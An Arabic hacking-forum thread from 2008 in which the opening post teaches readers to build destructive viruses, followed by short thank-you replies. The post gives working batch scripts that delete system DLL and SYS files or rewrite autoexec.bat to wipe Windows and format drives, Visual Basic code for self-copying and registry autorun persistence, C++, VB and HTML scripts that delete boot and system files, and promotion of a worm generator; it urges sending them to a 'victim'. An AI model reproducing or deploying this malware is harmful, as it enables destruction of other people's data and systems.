انت غير مسجل بمنتديات إقلاع سوفت ... للإشتراك اضغط هنا    
   
شبكة إقلاع سوفت  
منتديات - برامج - فيديو - صور دليل البرامج - دروس - خطوط - ماسنجر - العاب - توبيكات - تردد القنوات - الطقس
خريطة الموقع  خدمة RSS بشبكة إقلاع سوفت  جديد البرامج   New Releases
العاب والعاب للجوال - مقاطع بلوتوث - نغمات للجوال - ابتسامات وتواقيع - مسجات الجوال
صور

منتدى مجاني

منتدى سيدتي
شات صوتي
بنات كول
ايوان
بعد الإشتراك ستصلك رسالة لتفعيل الاشتراك
افتح الرسالة واضغط على زر Reply
ثم اضغط على زر Send

شرح طريقة الإشتراك بالصور

Facebook | vip600.com إقلاع سوفت

 
طلب كود التفعيل استعادة كلمة المرور شروط الكتابة بمنتديات إقلاع سوفت الشروط المجموعات شرح طريقة التفعيل تغييرات هامة بالشروط
العودة   منتديات إقلاع سوفت > منتديات إقلاع سوفت > منتدى البرامج

منتدى البرامج كل ما يتعلق بالبرامج الجديدة والقديمة وشرحها ومشاكلها


شرح فيروسات Dos و أكواد جاهزة مع شرح التركيب

غلق الموضوع
 
خيارات الموضوع طريقة العرض
قديم 28-05-2008, 02:49 AM   #1
الهكر المشاغب
عضو مشارك
 
الصورة الرمزية لـ الهكر المشاغب
 
إرسال رسالة عبر ICQ إلى الهكر المشاغب إرسال رسالة عبر  AIM إلى الهكر المشاغب إرسال رسالة عبر MSN إلى الهكر المشاغب إرسال رسالة عبر بريد الياهو إلى الهكر المشاغب إرسال رسالة عبر Skype إلى الهكر المشاغب
قف شرح فيروسات Dos و أكواد جاهزة مع شرح التركيب

شرح لأقوى طرق تصميم فيروس لن تجد مثله



بسم الله الرحمن الرحيم



هذا الموضوع من اقوىالمواضيع التى تجذب القراء و الراغبين فى تعلم الهكر و تجذب اكثر محبى البرمجةالذين يسعون الى تعلم كل جديد فى مجال البرمجة



و نظرا لأنى واحد منمحبى البرمجة احببت ان ابحث فى النت لتعلم طرق صناعة الفيروسات و الحمد لله وجدتالكثير من المعلومات التى افادتنى و دلتنى الى الطريق الذى انا اريده لذا اردت اناعلم كل من يريد ذلك و كل من يرغب فى تصميم فيروس



احب ان اوضح انالطرق سوف اشرحها هنا و هى عبارة عن 4 اجزاء و هى كل ما انا كتبته حتى الأن و سوفاضعها كلها هنا و هذا للتسهيل على كل من يجد هذا الموضوع مهم و يجذب



ارجوا اولا قبل البدأ فى هذا الموضوع ان اوضح شئ ان هذا الموضوع مننتاج تعب كبير مر على حتى انتجت مثل هذا الموضوع لذا ارجوا من كل من يريد نقلالموضوع ان يكتب انه نقله من Broken_ice و يكتب اسم المنتدى الذى نقله منه



قبل البدأ فى تعلم تصميم الفيروس يجب علينا تعلم بعض النقاط المهمةو هى التعريف بالفيروس و انواعه و شروطه و التى سوف اوضحها الأن



نبدأ الموضوع



تعريف الفيروس :



يمكن تعريف الفيروس على انه برنامج صغير الحجم يشغل نفسه ذاتيا اواعتمادا على احد برامج ويندوز دون علم المستخدم بذلك و هناك فيروسات تشغل نفسهابناء على وقت الساعة فى الويندوز او تاريخ اليوم و اشهر هذه الفيروسات هو تشيرنوبلالذى يعمل فى يوم السادس و العشرين من كل شهر و لقد سمى الفيروس بهذا الأسم نسبةالى الفيروسات الموجودة فى جسم الأنسان و التى تصيبه و تتكاثر بسرعة فيه و هى نفسفكرة عمل الفيروس الذى يصيب الكومبيوتر



و يجب توافر عدة شروط لكىيصبح الفيروس ذو فاعلية و هى

أن يكون ذا حجم صغير لكى لا يتم الانتباه اليه

أن يعتمد على نفسه فى التشغيل أو على البرامج الأساسية أو عن طريق الارتباطباحد الملفات

أن يكون ذا هدف و مغزى



-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

الأن و بعد انفهمنا بعض المصطلحات الأساسية و التى يجب ان نكون على دراية فلنبدأ فى التصميم

ولاكن قبل البدأ يجب ان اوضح شئ خطير جدا جدا جدا





((
اذا كنت مبتدئ او ممن يخشون التعامل مع الفيروسات فارجوان تقوم بفهم الموضوع دون اى محاولة منك لتصنيع الفيروسات لأنك و كما سوف ترى ان اىخطا فى اى كود سوف يؤدى الى اضرار كبيرة منها تدمير نظام التشغيل لذا ارجو الحزر منتصميم الفيروس وانا لست مسؤل عن اى ضرر قد ينشئ لك من الفيروسات التى سوف تقوم بها ))





الأن يجب ان نعرف ما هى الطرق التى سوف استخدمها فىصناعة الفيروسات



لقد تعرفت اثناء بحثى عبر الأنترنت على مجموعة منالطرق لتصميم الفيروسات و هى

عن طريق الـnotepad

عن طريق برنامجالفجول بيسك
(vb)

عن طريق برامج تصميم الفيروسات ( خطيرة جداااا وفيروساتها قوية – لكن اغلبها يكشفه النورتون)

و سوف اقوم الأن بعرض كل منهمعلى حذة و سوف اشرحهم لكم بالتفصيل اتمنى ان ينال اعجابكم ما سوف اقومبه

هذا هو الجزء الأول من صناعة الفيروسات و الذى سوف نقوم فيه على تعلمتصميم الفيروس بواسطة notepad



للعمل على تصميم فيروس بهذا النوع منالتصميمات يجب ان تعرف كيف تضع الأكواد التى سوف اعطيها لك و هى عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه باى اسم تريده ولاكن بامتداد .bat



و الأن بعد ان تعرفت على المكان كل ما عليك ان تضع الكود المناسبلك فى الnotepad و تحفظه و ..... فقط لا تقوم بأكثر من ذلك ألا اذا ارسلته الىالضحية التى تريد انهائها او يمكنك تجربت هذا الفيروس على جهاز التجارب اذا كانلديك



قبل ان اضع لكم الأكواد اريد ان اوضح ان هذه الأكواد منقولةطبعاولاكنى وضعت تحت كل كود اكبر شرح استطيع تقديمه عبر هذا الكود من حيث فكرةعمله و طريقة تعديله مع مثال بسيط عليه



اريد ان اوضح انه من الأفضلنسخ الكود و لصقه فى المكان الذى تريده



----------------------

نبدأ بالكود الأول :

---------------------



@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys



الـتوضـــــــــــتيح :



*
بعد ان قمت بوضعالكود و حفظه بامتداد .bat فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكلالأيقونة قد تغير الى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل واياك ان تفتحه

*
هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys منالسيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذاالكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين ويمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد فى اولالكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاهالأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامرالتالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز

*
بعد ان فهمنا هذا المود ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هليمكننا تعديل هذا الكود ؟!!

-----
لن ادعكم تفكرون فى الأجابة فانا سوفاعجبكم بكل بساطة و هى يمكننا ان نغير اى شئ قد فهمناه جيدا لذا نحن يمكننا ان نغيرهذا الكود قليلا وسو اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكانالذىيمكننا ان نغيره فىالكود فيمكننا ان نغير نوعية الملفات التى سوف يقوم بمسحهااو يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف يوجد فيه فمثلا هناك منيضعنوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا ان نغير اتجاهالفيروس الى d:



مثال توضيحى :

انا الأن اريد ان امزح معاحد و فى نفس الوقت عاوز اعلمه درس و تحزير فيمكننى ان اصنع فيروس يقوم بمسح جميعملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التىامتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التىتوجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى

@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf



ايه رايكم دلوقتى فى الفيروس الجديد اتمنى يعجبكم اما الأن فلنقراءالكود الثانى



----------------

الكود الثانى :

--------------



echo off@

cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat



الـتوضـــــــــــتيح :



الفيروس السابق يعتبر منالأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليسممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر



نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسحالشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا اليروس هو الوحيد

بعد سوفنجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن يمكننا ان نوضحانه هناك 3 اكود منفصله هم الفكرة الأسايه و هما ما سوف نحن نوضحه

echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
يعطى هذا المودالأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزلعلى الجهاز و نلاحظ تكراره فى مسح الويندوز فى الكود

echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
ولاكنه اذا قام بمسح الويندوزفهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك اعطى امر نسخ لهذان الأمرن حتىيمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين

echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat



اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هوموجود فى السطر التالى

echo format c: /q /u /autotest >nul >>c:\autoexec.bat



اولا يوجد بعض الامور توضيحها قبل البدأفى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:

سوف يجعله يعمل تلقائياعند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقمتحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه




ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضعفيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوزموضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخالأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات



اما بالنسبةلتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامرمسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما علىالـ D: فيكون لكود كما يلى



echo off@

cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat



----------------

الكود الثالث :

--------------



code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat



يعتبر هذا الفيروس نفس عمل السابق لذا انالست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه



كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمهبـ Autoexec.bat



الأن و بعد ان تعرفنا الى الأكواد السابقة مارأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده



الخاصــــــــــــــية الأولى :-



On Error Resume Next

Dim copy, copy2

copy = "c:\virus.exe"

copy2 = "c:\windows\system\Project12.exe"

FileCopy copy, copy2



يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكنللضحيه ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت منالفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه



الخاصــــــــــــــية الثانيه :-



Option Explicit



Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long

Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long



Private Const REG_SZ = 1

Private Const LOCALMACHINE = &H80000002





Private Sub Command1_Click()

Dim InputValue As String

Dim nBufferKey As Long, nBufferSubKey As Long





RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey

RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersi on", nBufferKey

RegOpenKey nBufferKey, "Run-", nBufferSubKey

InputValue = "c:\windows\system\Project12.exe"

RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersi on", nBufferKey

RegOpenKey nBufferKey, "Run-", nBufferSubKey

RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)



End Sub

يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتحالجهاز و هذا عن طريق تعديل ال registry :



هذا هو كل ما انا حصلتعليه من اكواد للفيروسات فلقد شرحت لكم مجموعه من اكواد الفيروسات التى يمكننا مناستخدامها و مجموعه من الأكواد التى باضافتها للفيروس تعطى له خصائص مفيده و هذاليس كل شئ فنا ان حصلت على ى كود اخر فسوف اعطيه لكم فى هذا الموضوع و سوف اشرح فيهكل ما انا استطيع لذا انتظروا منى المفيد و يتبقى لنى شئ بسيط وانهى هذا الجزء و هومجموعة اكواد لأشهر الفيروسات

فيرووس C++ :

*****************


#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat") ;
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe") ;
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}




فيرووس Visual Basic :

*****************


SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"



فيروس Html



*****************


<html>

<head>
<$$$$ http$$$$$$="$$$$$$$-Type"
$$$$$$$="$$$$/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" $$$$="#C0C0C0">
<$$$$$$ --------="VB$$$$$$">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set b = fso.GetFile("system.ini")
b.Delete
</$$$$$$>
<!--- This $$$$$$ author is THEONE---!>
</body>
</html>



(
ملاحظة يحفظهذا الفيروس بأمتداد html .* )

يمكنك من دراسة هذه الأكواد و النظر فيهاالى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوىيخصكم

هذا هو كل ما املك فى هذا الجزء و هو كما قلت لكم سابقا هو قابلللتطوير فانتظروا منى الكثير من الأكواد التى سوف اضعها لكم ولاكن كرد على هذاالموضوع

[/size][/b]
[/color]فيرووس C++ :

*****************


#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat") ;
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe") ;
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}




فيرووس Visual Basic :

*****************


SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"



فيروس Html



*****************


<html>

<head>
<$$$$ http$$$$$$="$$$$$$$-Type"
$$$$$$$="$$$$/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" $$$$="#C0C0C0">
<$$$$$$ --------="VB$$$$$$">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("$$$$$$ing.FileSystemObject ")
Set b = fso.GetFile("system.ini")
b.Delete
</$$$$$$>
<!--- This $$$$$$ author is THEONE---!>
</body>
</html>



(
ملاحظة يحفظهذا الفيروس بأمتداد html .* )

يمكنك من دراسة هذه الأكواد و النظر فيهاالى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوىيخصكم

هذا هو كل ما املك فى هذا الجزء و هو كما قلت لكم سابقا هو قابلللتطوير فانتظروا منى الكثير من الأكواد التى سوف اضعها لكم ولاكن كرد على هذاالموضوع

هذا هو الجزء الثانى من الفيروسات و هو اصغر الأجزاء نظرا لأنى سوفاضع فيه فكرة وليس طريقة شرح

و هو صنع فيروس بواسطة بعض البرامج الخاصةبذلك

هناك العديد من البرامج التى تؤدى ما انت تطمع قيه و بقوة ولاكنمعظمها خطر جدا و يكتشفه مضاد الفيروس

ولاكن هناك برنامج وجت بعض المعلوماتعنه وانا الأن اعد شرح مفصل و بالصور عنه ولاكنى اخشى من ان يتضرر منه المبتدأين وذلك لما سوف ترونه من مميزات هذا البرنامج الخطيرة



هذا البرنامجلأنشاء فيروس من نظام worm او الدودة و هو برنامج vbswg2 الشهير و هذا البرنامجخطيييييييييييير جدااااااااااا لأنه به صمم فيروس الحب ( I love u ) و فيروس آناكرنوكوفا العارية و من اهم مميزات التى تضاف الى الفيروس المصمم بهذا البرنامج انهيضرب outlook و يصيب الأميلات و ينتشر من خلاله وهذا عن طريق انه يضرب القائمةالبريدية للأميلات التى تكون انت مضيفها لديك و يضرب كل الأميلات التى انت مضيفها ويواصل انتشاره بهذه الطريقة



و من مميزات هذا البرنامج :

1-
يحفظ لك الدودة بامتداد jpg - gih - txt - html والامتداد الرئيسي vbs
2-
تضعفيه ميزة الإرسال عن طريق outlook واكيد الي يقرى الكلام فوق راح يعرف
3-
اولماتشغل Mirc راح يقوم على نشر نفسه
4-
يمكن تدمجه مع احدى الملفات
5-
يحذفلك جميع الملفات وهذا على حسب متطلباتك واستخدامك لخيارات البرنامج
6-
الظاهر لحد هنا كافي لتسميته فيروس او دودة ويوجد فرق كبير بينهم لكن المهم انهيدمر لك الجهاز ..... اكتشفوا المميزات الباقية بنفسكم



Download From




ملاحظه:

صاحب هذا البرنامج مايزال مسجون وهذادليل على شدة وخطورة البرنامج



لكن الانتي فايرس يكتشفه بسهوله



هذه صورة للبرنامج

هذا الشرح ليس كافيا اليس كذلك اعلمولاكنى لازلت اتعلم استخدام هذا البرنامج و احاول اتقانه حتى لا اقوم بشرح شئ خطأوانتم كما تعرفون انه من الخطر جدا حدوث اى خطأ يمكن ان يؤدى الى كارثة

هذاهو نهاية الجزء الأول ولاكن يتبقى لنا الجزء الثالث و هو عن طريق صنع فيروس بواسطةالفجول بيسك ولاكنى لم اكمله لذا انظروه منى قريبا

احب ان اوضح لكم جميعاشئ واحد وهو انى قد وضعت لكم هذه الطروق وليست هى النهاية ولاكن يبقى لدى الكثيرلأقدمه لكم فيما بعد و سوف اضعها لكم فى هذا الموضوع كرد عليه لذا عليكم بمتابعةهذا الموضوع اول باول

اما الأن كل ما استطيع قوله لكم هو انى اتمنى لكمالتوفيق دائما و اتمنى ان اكون قدمت لكم الجديد
منقول بواسطة الهكر المشاغب


التوقيع
أغنية المسلسل التركي سنوات الضياع MP3
موسيقى المسلسل التركي سنوات الضياع MP3
تحميل حلقات المسلسل التركي سنوات الضياع

الرجاء لكل زائر لموضوعي كتابة رد
ولو شكراً لأنك بهذه الكلمة ترفع معنويات
العضو وتشجعه على كتابة المواضيع
الهكر المشاغب غير متصل  
قديم 28-05-2008, 04:09 AM   #2
كـ الامواج ـاسر
عضو نشيط
 
إفتراضي

الله يعطيك العافيه اخوي
كـ الامواج ـاسر غير متصل  
قديم 28-05-2008, 05:58 AM   #3
الهكر المشاغب
عضو مشارك
 
الصورة الرمزية لـ الهكر المشاغب
 
إرسال رسالة عبر ICQ إلى الهكر المشاغب إرسال رسالة عبر  AIM إلى الهكر المشاغب إرسال رسالة عبر MSN إلى الهكر المشاغب إرسال رسالة عبر بريد الياهو إلى الهكر المشاغب إرسال رسالة عبر Skype إلى الهكر المشاغب
زعلان

إقتباس:
المشاركة الأصلية بواسطة: كـ الامواج ـاسر مشاهدة مشاركة
الله يعطيك العافيه اخوي
في خدمتك أخوي
الهكر المشاغب غير متصل  
قديم 28-05-2008, 08:03 AM   #4
الطحين2006
عضو مشارك
 
إفتراضي

يعطيك الف عافية
وشكووووووووووووووووور على الاكواد......
الطحين2006 غير متصل  
قديم 16-08-2008, 01:16 AM   #5
صقر17
عضو جديد
 
إفتراضي مشكور وعندي طلب

السلام عليكم ورحمة الله وبركاته
يعطيك الف عافيه و شكرآ على شرح المميز
بس عندي طلب
ارجو المساعدة
فيما يخص الملفات الدفعيه ذات الامتداد bat
اريد عمل وقت فاصل بين الامر الاول والامر الثاني يعني عداد تنا زلي
مثلآ
Del c:\a.bat
....... ؟؟؟ اريد الانتضار لمده دقيقاتن مثلآ
del d:\a.bat

طبعآ واضح الامر الاول ولامر الثالث اما الامر الواسط فهوضالتي اريد امرمهمته انتضارلمده احددها انا ثم المواصله
مشكورين مقدمآ
صقر17 غير متصل  
قديم 07-04-2009, 05:32 PM   #6
rabani6
عضو جديد
 
إفتراضي

’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’’شكرا لك اخي,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
rabani6 غير متصل  
غلق الموضوع

العلامات المرجعية

خيارات الموضوع
طريقة العرض

قوانين المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاح
كود [IMG] متاح
كود HTML غير متاح
الإنتقال السريع


جميع الأوقات بتوقيت غرينتش +3. الساعة الآن هي 01:15 AM.

 

 

 


[ برامج هامة ا أخبار التقنية ا الايفون ا الايباد ا كتب عربية ا جوالات ا الاندرويد ا جوجل ا القائمة البريدية ا مايكروسوفت ا
ابل ا سامسونج ا الجيميل ا سيري ا تصفح سريع للبرامج ا جافا ا اعلن لدينا]
عداد إقلاع سوفت